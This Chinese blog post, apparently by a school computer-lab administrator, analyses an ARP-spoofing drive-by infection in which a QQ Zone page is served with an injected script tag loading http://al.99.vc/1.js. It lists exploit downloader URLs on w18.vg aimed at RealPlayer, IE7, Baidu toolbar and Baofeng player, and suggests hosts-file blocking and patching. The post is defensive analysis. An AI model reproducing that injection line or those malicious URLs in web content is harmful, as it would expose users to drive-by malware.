al.99.vc挂马分析与解决建议

al.99.vc挂马分析与解决建议

arp最近似乎有热起来啦。这几天人一多就卡，不是一般的卡，QQ上去倒是没啥问题。就是网页几乎就打不开。巨慢！！

昨晚把机子都检查啦便并且关闭网络恢复系统。早起又中。

名字不一样，其中一个是usrinit.exe，我打算用好的userinit.exe去覆盖中毒的机子。

360arp防火墙打开不时会报警。但没有ip地址只有mac。这种欺骗性的arp用360arp防火墙根本不起作用似的。

因为这个机房我就让这个机子上拉，所以肯定是其他机房也arp啦

打开qq空间已经被挂马啦。

<script src=http://al.99.vc/1.js></script> <html><head><meta http-equiv=”Content-Type” content=”text/html;charset=gb2312″ /><script>var g_Src_Domain=”u.cnc.qzone.qq.com”,g_iUin=27020287,_s_=new Date(),g_JSON=1;</script><script src=”http://u.cnc.qzone.qq.com/cgi-bin/entry_js.cgi?uin=27020287&r=cnc”></script><script src=”http://cnc.imgcache.qq.com/qzone/G4.1.js”></script><script>if (typeof G41Loaded==”undefined”) location=”http://qzone.qq.com/new_help/error.htm”</script><noscript><img src=”http://cnc.imgcache.qq.com/qzone/noscript.gif”></noscript></html>

其他的站打开都没问题。刚发现还以为是腾讯空间有问题呢。急忙让朋友liu测试下没有发现我这情况（红色部分的挂马代码）。所以认为是被其他机房机子arp啦，arp dns！！！

看看放学能不能给别的机房沟通沟通看看。解决问题。

al.99.vc/1.js

这个主要是几个“图片”文件（所谓的木马下载者）！

http://w18.vg/real.gif貌似感染real，

http://w18.vg/ms.gif 种ie7

http://w18.vg/baidu.gif

百度bar（百度搜霸）的漏洞利用？

http://w18.vg/x1.gif

http://w18.vg/lz.gif

http://w18.vg/bf.gif

病毒样本-al.99.vc

先留着样本，闲下来在分析。

忙起来啦在说吧

解决建议：

修改系统盘：C:\WINDOWS\system32\drivers\etc＼host（用记事本打开）文件添加这句可以临时解决再次中这个站的木马病毒

127.0.0.1 al.99.vc

屏蔽这个网站就可以啦

。。。

http://w18.vg/real.gif貌似感染real，如果你有ｒｅａｌｏｎｅ建议卸掉或者去官方下载最新的版本装上。如果你看到ｒｅａｌｏｎｅ不是有错误提示说明你的ｒｅａｌｏｎｅ有漏洞。

http://w18.vg/ms.gif这个貌似只有ｉｅ７才会被中上。所以建议你打上最新的ｉｅ补丁。

http://w18.vg/baidu.gif百度搜霸的漏洞利用，建议直接卸掉就可以啦。或者升级你的搜霸。
http://w18.vg/x1.gif这个已经为404页啦不清楚是什么

http://w18.vg/lz.gif利用的是glchat的漏洞是一个聊天工具

http://w18.vg/bf.gif暴风影音的漏洞利用，建议去下载新的暴风影音

如果个人机子建议打开病毒实时检测功能。

如果你有更好的建议，谢谢分享。